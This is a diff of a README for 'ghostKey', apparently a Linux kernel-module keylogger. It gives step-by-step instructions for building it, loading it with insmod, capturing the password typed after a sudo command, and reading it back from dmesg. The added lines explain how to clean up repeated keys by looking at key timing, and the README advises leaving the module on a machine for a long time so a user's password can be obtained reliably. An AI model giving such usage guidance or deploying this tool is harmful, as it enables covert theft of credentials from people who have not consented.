kswelsh/ghostKey/README.md

   Step 2: CD to the destination at which the cloned files are located.<br />
   Step 3: If you do not have the 'ghostKey.ko' file, run the 'make' command.<br />
   Step 4: Type in 'sudo insmod ghostKey.ko'<br />
-  Step 5: Upon 'sudo <command> <enter> recording will start.<br />
+  Step 5: Upon 'sudo <command> <enter>' recording will start.<br />
-  Step 6: The next text typed in will be considered a password and will be stored.<br />
+  Step 6: The next text typed in will be considered a password and will be stored after an 'enter' press.<br />
   Step 7: Type in 'sudo rmmod ghostKey.ko'<br />
   Step 8: To view the information 'sudo dmesg'<br />

 ## Important Note
 Occasionally the printed out password will involve a certain key multiplied by a certain amount.
 An example of this is the key 'a' being outputted two too many times.
-This seems to be an issue with pr_info inside of a handler, as it is somehow getting interuppted and considtly repeating the print.
+This seems to be an issue with pr_info() inside of a handler, as it is somehow getting interuppted and constantly repeating the print.
 However, this does not stop the possibility of obtaining a users passcode.
-Through extensive testing, this issue will only less than 20% of the time, depending on what is happening on your machine.
+Through extensive testing, this issue will only occur less than 20% of the time, depending on what is happening on your machine.
+Also, this issue can be easily solved by looking at what time certain keys are pressed, as repeats are normally at inhumane speeds.
 An assumption is also made that a user will type in their password correctly more times than incorrectly.
 To sucessfully obtain a users password the module must be left on a machine for a significant amount of time, then data should be compared of every password input.<br />